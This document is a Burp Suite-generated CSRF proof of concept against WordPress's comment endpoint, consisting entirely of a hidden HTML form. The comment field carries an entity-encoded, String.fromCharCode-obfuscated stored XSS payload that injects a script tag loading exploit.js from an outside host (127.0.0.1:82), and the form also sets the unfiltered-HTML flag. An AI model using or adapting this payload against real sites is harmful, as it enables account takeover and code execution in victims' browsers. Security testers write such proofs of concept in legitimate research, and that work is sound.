<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wp-comments-post.php" method="POST">
      <input type="hidden" name="comment" value="&lt;a&#32;title&#61;&apos;hacker&#32;&quot;&#32;onclick&#61;&quot;var&#32;s&#61;document&#46;createElement&#40;String&#46;fromCharCode&#40;115&#41;&#43;String&#46;fromCharCode&#40;99&#41;&#43;String&#46;fromCharCode&#40;114&#41;&#43;String&#46;fromCharCode&#40;105&#41;&#43;String&#46;fromCharCode&#40;112&#41;&#43;String&#46;fromCharCode&#40;116&#41;&#41;&#59;s&#46;setAttribute&#40;String&#46;fromCharCode&#40;115&#41;&#43;String&#46;fromCharCode&#40;114&#41;&#43;String&#46;fromCharCode&#40;99&#41;&#44;String&#46;fromCharCode&#40;104&#41;&#43;String&#46;fromCharCode&#40;116&#41;&#43;String&#46;fromCharCode&#40;116&#41;&#43;String&#46;fromCharCode&#40;112&#41;&#43;String&#46;fromCharCode&#40;58&#41;&#43;String&#46;fromCharCode&#40;47&#41;&#43;String&#46;fromCharCode&#40;47&#41;&#43;String&#46;fromCharCode&#40;49&#41;&#43;String&#46;fromCharCode&#40;50&#41;&#43;String&#46;fromCharCode&#40;55&#41;&#43;String&#46;fromCharCode&#40;46&#41;&#43;String&#46;fromCharCode&#40;48&#41;&#43;String&#46;fromCharCode&#40;46&#41;&#43;String&#46;fromCharCode&#40;48&#41;&#43;String&#46;fromCharCode&#40;46&#41;&#43;String&#46;fromCharCode&#40;49&#41;&#43;String&#46;fromCharCode&#40;58&#41;&#43;String&#46;fromCharCode&#40;56&#41;&#43;String&#46;fromCharCode&#40;50&#41;&#43;String&#46;fromCharCode&#40;47&#41;&#43;String&#46;fromCharCode&#40;101&#41;&#43;String&#46;fromCharCode&#40;120&#41;&#43;String&#46;fromCharCode&#40;112&#41;&#43;String&#46;fromCharCode&#40;108&#41;&#43;String&#46;fromCharCode&#40;111&#41;&#43;String&#46;fromCharCode&#40;105&#41;&#43;String&#46;fromCharCode&#40;116&#41;&#43;String&#46;fromCharCode&#40;46&#41;&#43;String&#46;fromCharCode&#40;106&#41;&#43;String&#46;fromCharCode&#40;115&#41;&#41;&#59;s&#46;onload&#61;document&#46;body&#46;appendChild&#40;s&#41;&#59;&quot;&#32;id&#61;&quot;&apos;&#32;rel&#61;&quot;nofollow&quot;&gt;Exploit&#13;&#10;" />
      <input type="hidden" name="submit" value="Post&#32;Comment" />
      <input type="hidden" name="comment&#95;post&#95;ID" value="1" />
      <input type="hidden" name="comment&#95;parent" value="0" />
      <input type="hidden" name="&#95;wp&#95;unfiltered&#95;html&#95;comment" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
